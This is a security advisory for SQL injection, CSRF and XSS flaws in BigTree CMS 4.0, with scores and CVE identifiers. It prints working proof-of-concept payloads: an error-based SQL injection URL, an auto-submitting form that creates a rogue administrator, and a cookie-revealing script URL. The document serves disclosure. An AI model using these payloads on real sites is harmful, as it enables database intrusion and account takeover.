7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.004 Low
EPSS
Percentile
72.1%
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in applicationβs database and gain complete control over the application.
SQL Injection in BigTree CMS: CVE-2013-4879
The vulnerability exists due to insufficient sanitisation of user-supplied data passed to β/site/index.phpβ script. A remote unauthenticated attacker can execute arbitrary SQL commands in applicationβs database.
The following PoC (Proof of Concept) code displays version of MySQL server:
http://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28* %29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%2 9*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
SQL injection vulnerability was independently discovered by the Vendor just before High-Tech Bridge Security Research Lab.
Π‘ross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881
The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges.
The basic CSRF exploit below will create a new administrator βattackerβ with password βpasswordβ:
<form action=βhttp://[host]/site/index.php/admin/users/create/β method=βpostβ name=βmainβ>
<input type=βhiddenβ name=βemailβ value="[email protected]">
<input type=βhiddenβ name=βpasswordβ value=βpasswordβ>
<input type=βhiddenβ name=βlevelβ value=β1β>
<input type=βhiddenβ name=βnameβ value=βattackerβ>
<input type=βhiddenβ name=βcompanyβ value=βcompanyβ>
<input type=βsubmitβ id=βbtnβ>
</form>
<script>
document.main.submit();
</script>
Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880
The vulnerability exists due to insufficient filtration of user-supplied data in βmoduleβ HTTP GET parameter passed to β/site/index.php/admin/developer/modules/views/add/β URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses the βalert()β JavaScript function to display administratorβs cookies:
http://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl
CPE | Name | Operator | Version |
---|---|---|---|
bigtree cms | le | 4.0 |